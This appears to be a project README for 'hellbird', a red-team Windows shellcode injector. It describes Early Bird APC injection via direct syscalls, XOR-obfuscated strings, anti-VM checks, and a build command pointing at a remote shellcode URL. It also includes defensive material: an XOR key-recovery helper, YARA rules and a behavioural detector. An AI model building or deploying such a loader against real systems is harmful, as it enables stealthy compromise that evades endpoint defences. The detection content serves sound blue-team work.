
HELLBIRD

https://medium.com/@lazyown.redteam/the-hellbird-chronicles-when-your-notepad-becomes-a-cyber-assassin-and-why-thats-a-feature-not-54544dc2e099

https://deepwiki.com/grisuno/hellbird


  • GitHub Repository: https://github.com/grisuno/hellbird
  • License: GNU General Public License v3.0 (GPLv3)
  • Author: grisun0
  • Target Platform: Windows (x64)
  • Source Platform: GNU/Linux 6.12 (tested on Kali)
  • Purpose: Academic research and red teaming exercises

⚠️ This project is released under GPLv3. See the DISCLAIMER section for full legal terms.


πŸ” Overview

This document provides a comprehensive introduction to the hellbird repository, a sophisticated Early Bird APC injection framework designed for red team operations and academic security research. The framework implements advanced evasion techniques including direct NT API syscalls, string obfuscation, and anti-analysis mechanisms to bypass modern EDR/AV solutions on Windows x64 systems.

For detailed information about specific payload generation processes, see Payload Generation System. For integration into red team frameworks, see Framework Integration. For technical implementation details of evasion techniques, see Evasion Techniques.

hellbird is an Early Bird APC injection tool built on Hell's Gate. It downloads shellcode and executes it in a suspended legitimate Windows process using direct syscalls and asynchronous procedure calls (APCs), relying on string obfuscation, anti-analysis checks, and a hand-rolled WinSock HTTP downloader to evade basic detection mechanisms.

This tool is intended exclusively for academic and ethical penetration testing purposes.


πŸ› οΈ Technical Details


Direct Syscall Implementation

The framework implements the Hell's Gate technique to perform direct system calls, bypassing EDR userland hooks on NT API functions.

PEB Walking for NTDLL Resolution

The framework implements robust PEB (Process Environment Block) walking to locate ntdll.dll without relying on standard APIs that may be hooked.

Process Injection Evasion

The Early Bird APC injection technique combined with direct syscalls provides multiple layers of evasion against behavioral monitoring and EDR solutions.

🔧 Core Features

| Feature | Description |
| --- | --- |
| Early Bird APC Injection | Injects shellcode into a newly created, suspended process before it starts executing, bypassing user-mode hooks. |
| NT Native API Usage | Uses `Nt*` functions from ntdll.dll instead of common Win32 APIs to evade EDR userland hooks. |
| String Obfuscation | All sensitive strings (URL, process path, User-Agent) are XOR-encoded with a user-defined key. |
| Dynamic Shellcode Download | Fetches shellcode via a raw HTTP(S) request from a remote server. Shellcode must be in `\xNN` format. |
| Anti-Analysis | Detects VM environments (VMware, VirtualBox, QEMU, Xen) via registry checks and exits if detected. |
| Manual HTTP Client | Implements a minimal HTTP 1.1 client using WinSock to avoid WinINet/WinHTTP detection. |
| Stackless Compilation | Compiled with `-fno-stack-protector` and optimized for size (`-Os`) to reduce footprint. |

| NT API Function | Purpose | Syscall Usage |
| --- | --- | --- |
| NtAllocateVirtualMemory | Allocate RWX memory in target process | HellsGate(ssn_alloc) + HellDescent() |
| NtWriteVirtualMemory | Write shellcode to allocated memory | HellsGate(ssn_write) + HellDescent() |
| NtProtectVirtualMemory | Change memory protection to executable | HellsGate(ssn_protect) + HellDescent() |
| NtQueueApcThread | Queue APC for shellcode execution | HellsGate(ssn_apc) + HellDescent() |
| NtResumeThread | Resume suspended thread to trigger APC | HellsGate(ssn_resume) + HellDescent() |

📦 Build Process

The get_hellbird3.sh script generates:

  • hellbird.c: The main implant source code with embedded obfuscated configuration.
  • Makefile: Cross-compilation rules using MinGW-w64.

Build Requirements

```sh
sudo apt install mingw-w64 && sh install.sh
```

Build

```sh
./gen_hellbird3.sh \
  --target windows \
  --url "http://192.168.1.100/shellcode.txt" \
  --process-name "C:/Windows/System32/calc.exe" \
  --key 0x33
```

✅ Output: hellbird.exe, a fully self-contained Windows executable.

Compilation Flags Analysis

| Flag | Purpose | Security Impact |
| --- | --- | --- |
| `-lws2_32` | Link Winsock library | Network functionality |
| `-s` | Strip symbols | Anti-analysis |
| `-Os` | Optimize for size | Reduced footprint |
| `-fno-stack-protector` | Disable stack protection | Evasion technique |
| `-static` | Static linking | Standalone executable |

🧩 Code Architecture

1. String Obfuscation

All strings are XOR-encoded at compile time using a user-provided key (default: 0x33):

```c
unsigned char OBF_SHELLCODE_URL[] = { 0x12, 0x34, ... };
```

Decoded at runtime via:

```c
/* In-place single-byte XOR; the same routine decodes every obfuscated string. */
void xor_string(char* data, size_t len, char key) {
    for (size_t i = 0; i < len; i++) data[i] ^= key;
}
```

2. Shellcode Download & Extraction

  • Parses the HTTP response body.
  • Extracts shellcode in \xNN\xNN... format.
  • Applies XOR decryption using the same key.
  • Enforces a size limit: 2 MB by default.

3. Process Injection Flow

  1. Create the target process (e.g., calc.exe) in the SUSPENDED state
  2. Resolve NtAllocateVirtualMemory → allocate RWX memory
  3. Resolve NtWriteVirtualMemory → write shellcode
  4. Resolve NtQueueApcThread → queue an APC to the remote thread
  5. Resume the thread → the APC executes the shellcode

4. Anti-Analysis Checks

Checks the BIOS version string in the registry:

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Exits if any of the following substrings are found:

  • VMWARE
  • VBOX
  • QEMU
  • XEN
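A triage helper for the single-byte XOR scheme described under String Obfuscation, added here and not part of the hellbird project: given a byte blob carved from an implant (for example the contents of the `OBF_SHELLCODE_URL` array), it ranks all 256 keys by printable-ASCII ratio and known URL/path prefixes and recovers the configured URL and process path. The sample blobs are constructed from the build example above with the default key 0x33.

```python
"""Single-byte XOR key recovery for implant config strings (added analysis helper,
not hellbird project code). Mirrors the implant's xor_string(): plain[i] = blob[i] ^ key."""
import string

# Printable ASCII minus control whitespace; URLs and Windows paths fall entirely in this set.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
KNOWN_PREFIXES = (b"http://", b"https://", b"C:/", b"C:\\")  # how the obfuscated URL/path strings start


def xor_bytes(data: bytes, key: int) -> bytes:
    """The same single-byte XOR the implant applies; used for both encode and decode."""
    return bytes(b ^ key for b in data)


def score(candidate: bytes) -> float:
    """Fraction of printable bytes; the correct key yields 1.0 for a URL or path."""
    if not candidate:
        return 0.0
    return sum(b in PRINTABLE for b in candidate) / len(candidate)


def recover_key(blob: bytes) -> list[tuple[int, bytes]]:
    """Try all 256 keys and return the three best (key, plaintext) pairs.
    A known-plaintext prefix hit outranks any printable-ratio-only candidate."""
    ranked = []
    for key in range(256):
        plain = xor_bytes(blob, key)
        s = score(plain) + (1.0 if plain.startswith(KNOWN_PREFIXES) else 0.0)
        ranked.append((s, key, plain))
    ranked.sort(reverse=True)
    return [(key, plain) for _, key, plain in ranked[:3]]


# Constructed samples: the README's build-example URL and process path encoded with the default
# key 0x33, standing in for bytes carved out of the implant's obfuscated string arrays.
SAMPLE_URL = xor_bytes(b"http://192.168.1.100/shellcode.txt", 0x33)
SAMPLE_PROC = xor_bytes(b"C:/Windows/System32/calc.exe", 0x33)

if __name__ == "__main__":
    for blob in (SAMPLE_URL, SAMPLE_PROC):
        key, plain = recover_key(blob)[0]
        print(f"key=0x{key:02x} -> {plain.decode('ascii', 'replace')}")
```

Because the key is a single byte and every string shares it, recovering it from one array decodes the User-Agent and process path as well.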

πŸ” Detection Signatures (For Blue Teams)

🧫 YARA Rule Suggestions

Basic IOC: Obfuscated Strings + NT API Imports

Note that the `6A 04 6A 00 ...` and `68 ... 83 c4 08` byte patterns are 32-bit push/call sequences (push imm8, push imm32, add esp, 8); an x64 build passes arguments in registers, so expect these two strings to miss on the x64 hellbird.exe described above and treat them as hints rather than anchors of the condition.

```yara
rule ebird3_EarlyBird_APC {
    meta:
        author = "LazyOwn BlueTeam Analyst"
        description = "Detects ebird3 Early Bird APC injector"
        reference = "https://github.com/grisuno/ebird3"
        license = "GPLv3"

    strings:
        $xord_url = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 08 } // XOR loop pattern
        $ntdll_imports = "ntdll.dll" ascii wide
        $nt_func1 = "NtAllocateVirtualMemory"
        $nt_func2 = "NtWriteVirtualMemory"
        $nt_func3 = "NtQueueApcThread"
        $nt_func4 = "NtClose"
        $create_suspended = { 6A 04 6A 00 6A 00 6A 00 6A 00 6A 00 } // CREATE_SUSPENDED flag
        $http_get = "GET /" ascii wide
        $user_agent = "Mozilla/5.0 (Windows NT 10.0;" ascii wide

    condition:
        all of ($nt_func*) and $ntdll_imports and $create_suspended and
        ($http_get or $user_agent) and $xord_url
}
```

Heuristic: Suspicious Memory Allocation + APC

`MEM_COMMIT | MEM_RESERVE` and `PAGE_EXECUTE_READWRITE` are source-level macro names and the `$apc_call` regex matches disassembly listings, so this rule is suited to scanning source trees or disassembler output rather than stripped binaries.

```yara
rule ebird3_NtQueueApcThread_Heuristic {
    meta:
        author = "LazyOwn BlueTeam"
        description = "Detects use of NtQueueApcThread for shellcode execution"

    strings:
        $apc_call = /call.*GetProcAddress.*NtQueueApcThread/
        $alloc_exec = "MEM_COMMIT | MEM_RESERVE" fullword
        $page_exec_rw = "PAGE_EXECUTE_READWRITE" fullword

    condition:
        $apc_call and $alloc_exec and $page_exec_rw
}
```

Hell's Gate variant: Syscall Names + PEB Access

```yara
rule hellbird_EarlyBird_HellsGate {
    meta:
        author = "LazyOwn BlueTeam"
        description = "Detects hellbird Early Bird + Hell's Gate injector"
        license = "GPLv3"

    strings:
        $ntdll_import = "ntdll.dll" ascii wide
        $syscall1 = "NtAllocateVirtualMemory"
        $syscall2 = "NtWriteVirtualMemory"
        $syscall3 = "NtQueueApcThread"
        $syscall4 = "NtResumeThread"
        $create_suspended = { 6A 04 6A 00 6A 00 6A 00 6A 00 6A 00 } // CREATE_SUSPENDED
        $xor_loop = { 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 08 }
        $peb_access = "gs:0x60" nocase

    condition:
        all of ($syscall*) and $ntdll_import and $create_suspended and $xor_loop and $peb_access
}
```
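The rules above are static byte and string matches. The injection flow in the Code Architecture section is also a behavioural chain that kernel-level telemetry can observe even though the user-mode hooks the tool bypasses cannot. As an added defensive example, not hellbird project code, this correlator flags a source process that creates a target suspended and then, within a time window, allocates RWX memory in it, writes to it, queues an APC and resumes it. The event schema and field names are constructed for the example and do not correspond to any specific product.

```python
"""Behavioural correlator for the Early Bird APC chain (added defensive example, not hellbird code).
Event schema and field names below are constructed for illustration, not a real product's."""

# The chain in the order the README's "Process Injection Flow" lists it; all five must occur in order.
STAGES = ("process_create_suspended", "remote_alloc_rwx", "remote_write", "queue_apc", "thread_resume")
SIMPLE_TYPES = {"RemoteMemoryWrite": STAGES[2], "QueueApcThread": STAGES[3], "ResumeThread": STAGES[4]}
WINDOW_S = 10.0  # the whole chain must complete within this many seconds of the suspended create

def stage_of(ev: dict):
    """Map one telemetry event to a chain stage, or None if it is not part of the pattern."""
    t = ev["type"]
    if t == "ProcessCreate" and ev.get("flags", 0) & 0x4:  # 0x4 == CREATE_SUSPENDED
        return STAGES[0]
    if t == "RemoteMemoryAlloc" and ev.get("protect") == "PAGE_EXECUTE_READWRITE":
        return STAGES[1]
    return SIMPLE_TYPES.get(t)

def detect_early_bird(events: list[dict]) -> list[tuple[int, int]]:
    """Return (source_pid, target_pid) pairs that completed the full chain, in order, inside WINDOW_S."""
    progress = {}  # (source, target) -> (index of the next expected stage, ts of the suspended create)
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = stage_of(ev)
        if stage is None:
            continue
        pair = (ev["source_pid"], ev["target_pid"])
        if stage == STAGES[0]:
            progress[pair] = (1, ev["ts"])  # a suspended create (re)starts the chain for this pair
            continue
        idx, start = progress.get(pair, (0, 0.0))
        if idx == 0 or stage != STAGES[idx] or ev["ts"] - start > WINDOW_S:
            continue  # no create seen, out of order, or too slow: not this pattern
        if idx + 1 == len(STAGES):
            hits.append(pair)
            del progress[pair]
        else:
            progress[pair] = (idx + 1, start)
    return hits

# Constructed telemetry: one complete chain (pid 4242 -> 5150) plus a debugger-style suspended
# create (pid 900 -> 901) that is simply resumed and must not alert.
SAMPLE_EVENTS = [
    {"ts": 1.0, "type": "ProcessCreate", "source_pid": 4242, "target_pid": 5150, "flags": 0x4},
    {"ts": 1.1, "type": "RemoteMemoryAlloc", "source_pid": 4242, "target_pid": 5150, "protect": "PAGE_EXECUTE_READWRITE"},
    {"ts": 1.2, "type": "RemoteMemoryWrite", "source_pid": 4242, "target_pid": 5150},
    {"ts": 1.3, "type": "QueueApcThread", "source_pid": 4242, "target_pid": 5150},
    {"ts": 1.4, "type": "ResumeThread", "source_pid": 4242, "target_pid": 5150},
    {"ts": 2.0, "type": "ProcessCreate", "source_pid": 900, "target_pid": 901, "flags": 0x4},
    {"ts": 2.5, "type": "ResumeThread", "source_pid": 900, "target_pid": 901},
]
```

Running `detect_early_bird(SAMPLE_EVENTS)` returns only the `(4242, 5150)` pair; the suspended-then-resumed debuggee never passes the RWX allocation stage and is ignored.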

πŸ›‘οΈ Evasion Techniques

  • NT API Calls: bypasses userland API hooks from EDRs
  • No WinINet/WinHTTP: avoids common HTTP beaconing detection
  • XOR Obfuscation: hides the C2 URL and process name
  • Anti-VM: prevents analysis in sandboxed environments
  • Small Binary Size: harder to analyze statically
  • APC Injection: executes before the main thread starts (early bird)

⚠️ DISCLAIMER - NO WARRANTY OR LIABILITY

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

🎓 Educational Purpose

This project is intended to:

  • Help security researchers understand APC injection and NT API abuse.
  • Assist blue teams in developing better detection rules.
  • Promote awareness of living-off-the-land techniques.
